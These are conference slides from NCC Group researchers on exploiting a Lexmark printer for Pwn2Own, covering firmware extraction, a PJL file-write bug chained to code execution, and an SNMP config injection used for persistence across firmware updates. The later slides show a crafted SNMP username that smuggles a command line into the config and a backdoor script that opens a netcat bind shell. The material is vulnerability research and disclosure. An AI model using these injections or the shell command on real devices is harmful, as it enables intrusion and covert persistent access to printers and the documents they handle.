Toner Deaf Hexacon 2022 Release

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Toner deaf - Printing your next persistence

Talk overview
Platform Security
Hardware Security
Software Security
Remote Exploitation
PJL File Write Vulnerability (CVE-2021-44737)
Secure Boot
Filesystem Security
SNMP Config Injection (CVE-2022-29850)

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/us (NCC Group)
Exploit Development Group (EDG)
Cedric Halbronn @saidelike
Windows, Linux, Embedded, NAS devices, printers, etc.
Alex Plaskett @alexjplaskett
Windows, macOS, Linux, Embedded, etc.
Aaron Adams @fidgetingbits
Xen, Windows kernel, Cisco devices, Android, Linux Kernel, etc.

Hardware Security Team

Catalin Visinescu @cvisines
Amazing hardware support!

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Platform Security Overview
So what's happening?
Bought a Lexmark printer for Pwn2Own 2021 and had no idea about printer security!
Very little previous research online
Where to start? A few goals:
Be able to analyze the software running on the device (statically)
Be able to debug the printer live and determine what's going on (dynamically)
Two-pronged approach
Hardware Analysis
Software Analysis

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Platform Security Overview
Hardware Security
Software Security

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Hardware Research
Immediately clear there was not a lot about this
device online or lexmark printers on a whole
Two printers purchased
OTA update firmware is encrypted
Time to open it up and see what's inside!

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Main PCB

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Marvel SOC and Micron NAND flash

Marvell 88PA6220-BUX2 Micron MT29F2G08ABAGA

Printer specific ARM SOC The 2G in the flash model stands for 2Gb (gigabit), i.e.

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Serial UART (JRIP1)
TX pin enabled, output:

U-Boot 2018.07-AUTOINC+761a3261e9 (Feb 28 2020 - 23:26:43

## Booting kernel from Legacy Image at 00a00000 ...
Image Name: Linux-4.17.19-yocto-standard-74b
Image Type: ARM Linux Kernel Image (uncompressed)
Data Size: 4773352 Bytes = 4.6 MiB
Load Address: 00008000
Entry Point: 00008000

RX pin disabled? No interactive u-boot shell

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Extracting the Firmware From Flash
Connect the TSOP-48 adapter to the flash
Delicate job performed under the microscope
Remove flash using heat gun (melt solder)
Clean flash pins carefully
Place flash carefully into adapter, align pins
Programmer: select the specific model of flash
Read content, if error clean pins again and repeat

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Extracting the Firmware (cont.)
Flash dump is exactly 285,212,672 bytes (272MB) long, more than expected 268,435,456 bytes (256MB)
The extra bytes are the OOB data
Needs to be removed before image can be used
Contains error codes, and flags for bad block management among other things
Each page has 2048-byte usable data + 128 bytes OOB data (2176 bytes)
Usable flash size = 272MB * 2048 / 2176 = 256MB

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Extracting the Printer Binaries
We also see the "UBI#" block signature showing up
UBI Volumes Extraction
ubireader_display_info to view the volumes
ubireader_extract_images to extract the volumes
Interesting to us
img-0_vol-Base.ubifs contains the interesting binaries
(squashfs, read-only volume)
img-0_vol-InternalStorage.ubifs contains the user
data (ubifs, writable volume)

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Mission Accomplished - Static Firmware Analysis
Extract with unsquashfs
Can now access the binaries!
So no block based encryption (e.g. dm-crypt)

$ unsquashfs img-0_vol-Base.ubifs
$ ls -l Base_squashfs_dir
drwxr-xr-x 2 cvisinescu cvisinescu 4096 Jun 22 2021 bin
drwxr-xr-x 2 cvisinescu cvisinescu 4096 Jun 22 2021 boot
-rw-r--r-- 1 cvisinescu cvisinescu 909 Jun 22 2021 Build.Info
drwxr-xr-x 2 cvisinescu cvisinescu 4096 Mar 11 2021 dev
drwxr-xr-x 53 cvisinescu cvisinescu 4096 Jun 22 2021 etc
drwxr-xr-x 6 cvisinescu cvisinescu 4096 Jun 22 2021 home
drwxr-xr-x 8 cvisinescu cvisinescu 4096 Jun 22 2021 lib
drwxr-xr-x 2 cvisinescu cvisinescu 4096 Mar 11 2021 media
drwxr-xr-x 2 cvisinescu cvisinescu 4096 Mar 11 2021 run
drwxr-xr-x 2 cvisinescu cvisinescu 4096 Jun 22 2021 sbin

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Platform Security Overview
Hardware Security
Software Security

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Operating System
OS is based on Yocto Linux
Lexmark have custom layers to support their platform

meta-yocto-bsp = "HEAD:5dabbae1203cdd72b9045179d4bc483f5666a46a"
meta-filesystems = "HEAD:8760facba1bceb299b3613b8955621ddaa3d4c3f"
meta-lexmark = "HEAD:136f640c48187469a17b568cf30e9a47aeca5097"
meta-granite = "HEAD:f1a3e7f37995d5b7907ca7dc22f83f3827164203"
meta-armada = "HEAD:4fd14a06ba117531efbe1e5f1ee1030209bd2b4a"
meta-abrt = "HEAD:a55df92c6fc027eeff4148857371213462cb8bd8"
meta-rust = "HEAD:abb625bac074fbe627ee6b5bf7934491804cf876"
meta-qt4 = "HEAD:8e791c40140460825956430ba86b6266fdec0a93"
meta-gplv2 = "HEAD:813b7d2b5573d8591c6cd8087b326f0a0703d6b9"

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Listening Services
Map external attack surface and determine binaries from firmware
Reminder we don't have a shell at this point, as UART is RX pin is not enabled

FTP 21 tcp - ftpd

HTTP 80 tcp web - httpd
IPPS 443 tcp web - httpd
LPR/LPD 515 - lpd
IPP 631 tcp web - httpd
ROB 5010 tcp debug - not running
HTTP 8000 tcp web - not running
Enhanced-Print 9400
NPAP 9500 - ipnpa
NPAP 9501 - ipnpa
IPDS 9600
Debug 10000 tcp debug
MEX 65001 - WebServicesDaem
WS-Print 65002 - WebServicesDaem
WS-Eventing 65003 - WebServicesDaem
WS-Scan 65004 - mstscan-webservice

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Remote Object Service Bus (ROB)
Firewalled internal service

tcp LISTEN 0 128 *:5010 *:* users:


ROB seems to be a custom Lexmark RPC-style mechanism, designed to allow interaction between objects via
sockets (UDP and TCP)
ROB objects are extensively used by most services
Written in Rust and implemented in uranium
Allows services on the device to share information and communicate
Main focal point of things running on the device

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ROB tools
This part was done when we eventually got a shell
Harder to determine statically

root@XXXXXXXXXXXXXX:~# rob help

Command-line remote object bus client

Available commands:
ls list objects on the bus
elem elemformat [args]
call object method elemformat [args]
sendevent object event elemformat [args]
observeevent object event
waitforobject waitforobject objectname [timeoutseconds]
help list commands and arguments
morehelp more in-depth explanation of this tool

Services communicate on the bus

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Remote Object Service Bus (ROB)
Example RPC in code as follows:

int display_ui_message()
instance = rob_proxy_instance();
rc = 0;
elem = rob_proxy_call_with_format(
if ( rc )
printf("%s: rc = %d\n", "display_ui_message", rc);
return rob_elem_free(elem);

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What about other components?
That was actually a bit of a detour..
A lot is written in Rust?
Hell No! The majority of binaries are still in native C
However, using Rust for this central uranium component is a good design choice
Memory corruption still very much a thing with the external network services
Perhaps because they are really old? Massive undertaking to rewrite

What about crash output?

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Crash Analysis and Coredumps
WebUI coredumps are encrypted:
We do have some crash stacks / memory maps via UART (but no registers):

:{ "signal": 6
:, "executable": "/usr/bin/hydra"
:, "stacktrace":
: [ { "crash_thread": true
: , "frames":
: [ { "address": 1261290060
: , "build_id_offset": 180812
: , "function_name": "gsignal"
: , "file_name": "/lib/"
: }
: , { "address": 1261294256
: , "build_id_offset": 185008
: , "function_name": "abort"
: , "file_name": "/lib/"

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Hydra - TCP 9100
Native C service which handles all the print related functionality
Printer Job Language (PJL)
Printer Control Language (PCL)
A huge amount of code is within this binary and is also another key component

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Attacking Hydra?

Arch: arm-32-little
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x10000)
FORTIFY: Enabled

Network-based fuzzing - limited debug visbility (no)
Static reverse engineering (logic bugs!)
External data flowing in

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Hydra - Printer Job Language (PJL)

We started off reversing all the PJL handler functions

pjlpGrowCommandHandler("LREADRFIDTRACE", pjl_handle_lreadrfidtrace);
pjlpGrowCommandHandler("LDLWELCOMESCREEN", pjl_handle_ldlwelcomescreen);
pjlpGrowCommandHandler("LPORTLOOPBACK", pjlHandlerLPortLoopBack);
pjlpGrowCommandHandler("LEMAILALERTSDEBUG", pjl_handle_lemailalertsdebug);
pjlpGrowCommandHandler("LFAXSERVICE", pjl_handle_lfaxservice);

We are interested in LDLWELCOMESCREEN as undocumented Lexmark command

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Remote Exploitation
Remote Exploitation
PJL File Write (CVE-2021-44737)

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Support a "file" command argument

int __fastcall pjl_handle_ldlwelcomescreen(char *client_cmd)

result = pjl_check_args(client_cmd, "FILE",
if ( result <= 0 )
return result;
filename = (const char *)pjl_parse_arg(client_cmd, "FILE", 0);
return pjl_handle_ldlwelcomescreen_internal(filename);

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Opens fd, calls inner function, closes fd and removes the file

unsigned int __fastcall pjl_handle_ldlwelcomescreen_internal(const char

if ( !filename )
return 0xFFFFFFFF;

fd = open(filename, 0xC1, 0777); // open(filename,O_WRONLY|O_CREAT|O_EXCL,

if ( fd == 0xFFFFFFFF )
return 0xFFFFFFFF;
ret = pjl_ldwelcomescreen_internal2(0, 1, pjl_getc_, write_to_file_, &fd);
if ( !ret && pjl_unk_function && pjl_unk_function(filename) )
remove(filename); // Removal is annoying!
return ret;

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Understanding the File Write
Internal function responsible for reading additional data and writing to opened file

We fully reversed this (more details on the blog)

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Confirming the File Write

for i in 9 8 7 6 5 4 3 2 1 0; do
if [ -e /var/fs/shared/eventlog/logs/debug.log.$i ] ; then
cat /var/fs/shared/eventlog/logs/debug.log.$i

File automatically deleted between 1min and 1m40

Find something that uses it within that time

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Exploiting the Crash Event Handler aka ABRT
Spent a lot of time looking for a way to execute code
A lot of the file system was mounted read only (overlay filesystem)
Can't overwrite existing files
This looks interesting!

$ ls ./squashfs-root/etc/libreport/events.d
abrt_dbus_event.conf emergencyanalysis_event.conf rhtsupport_event.conf
ccpp_event.conf gconf_event.conf smart_event.conf
centos_report_event.conf koops_event.conf svcerrd.conf
coredump_handler.conf print_event.conf uploader_event.conf

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Coredump Handler
How does this config work?

# coredump-handler passes /dev/null to abrt-hook-

ccpp which causes it to write
# an empty core file. Delete this file so we don't
attempt to use it.
EVENT=post-create type=CCpp
[ "$(stat -c %s coredump)" != "0" ] || rm

If you need to collect the data at the time of the

crash you need to create a hook that will be run
a post-create event.

WARNING: post-create events are run with root


Yeah this sounds exactly what we need!

i h l

34 / 59
AWK / Log Rotation Bug!
Found through fuzzing HTTP server (over the network)

# awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print

a[i]}' \
free(): invalid pointer

Race condition exists

Rotation for every 32KB of logs that are generated
Resulting log file unique at a one second granularity

ErrorLog "|/usr/sbin/rotatelogs -L '/run/log/apache_error_log' -p

'/usr/bin/' /run/log/apache_error_log.%Y-%m-%d-%H_%M_%S

Generate HTTP logs such that rotation occurs 2x within one second
Two instances of parse same filename

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Full Chain

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PJL File Write Demo

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We didn't need this for Pwn2Own
However, persistence on a printer is a real world threat
No AV/EDR for printers
No IR visbility?
No automatic update
Access to lots of confidential business documents
Who knows if their printer is compromised?
More serious if it persists across firmware updates too

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Secure Boot
Filesystem Security
SNMP Config Injection (CVE-2022-29850)

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Flash Analysis

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Getting a Shell?
Modifying u-boot?
Patch bootdelay_process() to enable a shell

s = env_get("bootdelay");
if ( s )
bootdelay_default = simple_strtol(s, 0, 10);
// #define CONFIG_BOOTDELAY 5 /* autoboot after 5 seconds */
// but here default is -2
bootdelay_default = -2;
bootdelay = fdtdec_get_config_int((void *)gd->fdt_blob, "bootdelay", bootdelay_default);

Requires UART RX connected (?)

Modifying the UBIFS partition?
Patch the script to run telnet?
Possible if filesystem not security checked

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Secure Boot?
Initial reversing done
Not tested due to being able to correctly dump/unpack
No bootloader/kernel/filesystem encryption
We got persistence at filesystem level (see later)
Future research area to determine effectiveness of the chain

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Secure Boot
Filesystem Security
SNMP Config Injection (CVE-2022-29850)

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File System Persistence
/dev/mapper/verity_ubiblock0_3 on / type squashfs (ro,noatime) No No
/dev/mtdblock3 on /run/media/nvmirror type jffs2 (rw,nodev,noatime) Yes No
overlay on /etc type overlay (rw,nosuid,nodev,relatime,lowerdir=/etc, Partial No
/dev/zram0 on /run type ext4 (rw,nosuid,nodev,noexec,noatime,...) Yes No
/dev/ubi0_24 on /var/fs type ubifs (rw,nosuid,nodev,noexec,...) Yes Yes

Most of filesystem is read only (squashfs)

NVRAM mirror => not persistent?
Overlay => not writable or volatile
/etc/libreport/events.d/aaa.conf => not persistent

/run flushed on reboot => /run/debug-level/debug not persistent

Settings are stored in /var/fs/shared/settings => persistent

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Stored in: /var/fs/shared/block_*.data or /var/fs/shared/netapps/block_*.data
Lexmark tools: read_block_value or netapps_read_block_value
Requesting the serial number:

root@XXXXXXXXXXXXXX:~# read_block_value -d 1 /var/fs/shared/settings

Looking for block information for NPA_NVSERIALNUM.
0x015a results:
group 54.
id 50.
asprintf stat 37.
block_file_name /var/fs/shared/settings/, fp 0x4a1e8.
items 1.
block_size 2380.
items 1.
version 1.
final len 13, valueYYYYYYYYYYYYY

46 / 59
Settings Parser/Modifier in Python
# ./ --block-directory settings/ --variable-id
(09:28:06) [*] Looking for block information for 0x15a (NPA_NVSERIALNUM).
(09:28:06) DBG: block_file_name settings/
(09:28:06) DBG: block_size 2380.
(09:28:06) DBG: items 1.
(09:28:06) DBG: version 1.
(09:28:06) [*] offset 0x62a / cur 50 / size 13 (0xd).
(09:28:06) [*] name NPA_NVSERIALNUM.
00000000: 59 59 59 59 59 59 59 59 59 59 59 59 59 YYYYYYYYYYYYY

Lots of them:

{'group': 85, 'id': 14, 'npa_id_int': 4361, 'npa_id_str':

{'group': 54, 'id': 50, 'npa_id_int': 346, 'npa_id_str': 'NPA_NVSERIALNUM'},
{'group': 9, 'id': 5, 'npa_id_int': 6014, 'npa_id_str': 'NPA_FAMILY_ID'},
{'group': 9, 'id': 9, 'npa_id_int': 6037, 'npa_id_str':

47 / 59
Secure Boot
Filesystem Security
SNMP Config Injection (CVE-2022-29850)

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SNMP Config Injection (CVE-2022-29850)
Exploit RCE (e.g. previously described PJL file write) to get shell access on CXLBL.075.281
Exploit CVE-2022-29850 to install persistent backdoor
Reboot - persistence mechanism still in place and shell access maintained
Update to CXLBL.076.301 - persistence mechanism still in place and shell access maintained

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SNMP Setting Analysis
On the Web UI (logged in as admin)
Go to "Settings > Network and Ports > SNMP" menu
Go to "Set Read-only Credentials"
Enter edg_rw_cred_user in the "User Name"

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SNMP Setting Analysis

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Controlled data in SNMP config
root@XXXXXXXXXXXXXX:~# cat /var/dev/netapps/snmpd.conf
access public "" any noauth prefix all_remote nosettingsmib none
rouser edg_rw_cred_user priv -V all_remote "*"
access remote_mgmt "" usm priv exact all_remote all_remote all_remote

You can guess what is coming

Can we inject a \n in the rouser to add an extra line?
Can we extend the SNMP MIB?

52 / 59
Attempt 1 - FAILED
Manually patch /var/fs/shared/settings/netapps/

# python --block-directory settings/netapps/ --group 5 --id 10 \

--new-value edg_rw_cred_user_new_value
(14:52:09) [*] old size 16 (0x10).
(14:52:09) [*] old value:
00000000: 65 64 67 5F 72 77 5F 63 72 65 64 5F 75 73 65 72 edg_rw_cred_user
(14:52:09) [*] new size 86 (0x56).
(14:52:09) [*] new value:
00000000: 50 0A 0D 65 78 74 65 6E 64 2D 73 68 20 2E 31 2E P..extend-sh .1.
00000010: 33 2E 36 2E 31 2E 32 2E 31 2E 31 2E 35 2E 30 20
00000020: 73 68 65 6C 6C 33 20 2F 62 69 6E 2F 74 6F 75 63 shell3 /bin/touc
00000030: 68 20 2F 74 6D 70 2F 65 64 67 31 3B 20 2F 62 69 h /tmp/edg1; /bi
00000040: 6E 2F 65 63 68 6F 20 22 79 6F 79 6F 22 3B 20 65 n/echo "yoyo"; e
00000050: 78 69 74 20 30 23 xit 0#
(14:52:09) [*] Writing changes in settings/netapps/out/

53 / 59
Attempt 1 - FAILED
Manually patch /var/fs/shared/settings/netapps/

# python --block-directory settings/netapps/ --group 5 --id 10 \

--new-value edg_rw_cred_user_new_value
(14:52:09) [*] old size 16 (0x10).
(14:52:09) [*] old value:
00000000: 65 64 67 5F 72 77 5F 63 72 65 64 5F 75 73 65 72 edg_rw_cred_user
(14:52:09) [*] new size 86 (0x56).
(14:52:09) [*] new value:
00000000: 50 0A 0D 65 78 74 65 6E 64 2D 73 68 20 2E 31 2E P..extend-sh .1.
00000010: 33 2E 36 2E 31 2E 32 2E 31 2E 31 2E 35 2E 30 20
00000020: 73 68 65 6C 6C 33 20 2F 62 69 6E 2F 74 6F 75 63 shell3 /bin/touc
00000030: 68 20 2F 74 6D 70 2F 65 64 67 31 3B 20 2F 62 69 h /tmp/edg1; /bi
00000040: 6E 2F 65 63 68 6F 20 22 79 6F 79 6F 22 3B 20 65 n/echo "yoyo"; e
00000050: 78 69 74 20 30 23 xit 0#
(14:52:09) [*] Writing changes in settings/netapps/out/

Reboot the printer and crash loop :-(

abrt-hook-ccpp[1614]: Process 1151 (hydra) of user 0 killed by SIGABRT - dumping core

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Attempt 2
On the Web UI (logged in as admin), go to the "Settings > Network and Ports > SNMP" menu
Go to "Set Read-only Credentials" and enter in the "User Name" field
b extend-sh .1.2 c . /var/fs/a #

Store preliminary controlled data in the printer's setting

Allow for minimal amount of changes
Manually patch /var/fs/shared/settings/netapps/
Switch the space (0x20) to a newline (0x0a) between b and extend-sh

54 / 59
Restarting snmpUTIL shows the injection:

access public "" any noauth prefix all_remote nosettingsmib none

rouser b
extend-sh .1.2 c . /var/fs/a # priv -V all_remote "*"
access remote_mgmt "" usm priv exact all_remote all_remote all_remote

Side effects
extend-sh command executed at boot time => extends the SNMP MIB dynamically

Manually query snmpwalk => /var/fs/a script executed on-demand

Beforehand, use SSH shell to create /var/fs/a:

/bin/touch /tmp/helloworld
id > /tmp/id.txt
nc -l -p 1337 -e /bin/ash &
echo "aaa"

55 / 59
Persistence Demo

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Persistence Could be improved
Persists among reboot/update but not configuration Security through obscurity a bit
Platform visibility => issues can be found
Network-facing services are still C / random shell
Done well scripts
Relatively modern OS platform base (Yocto) Enable auto updates
Responsive vendor / handle security issues well Ensure mitigations are complete across all binaries
Rust for central component (ROB) Stack canaries, PIE
Lack major hardware protections: no encryption

58 / 59
Thank you! Questions?

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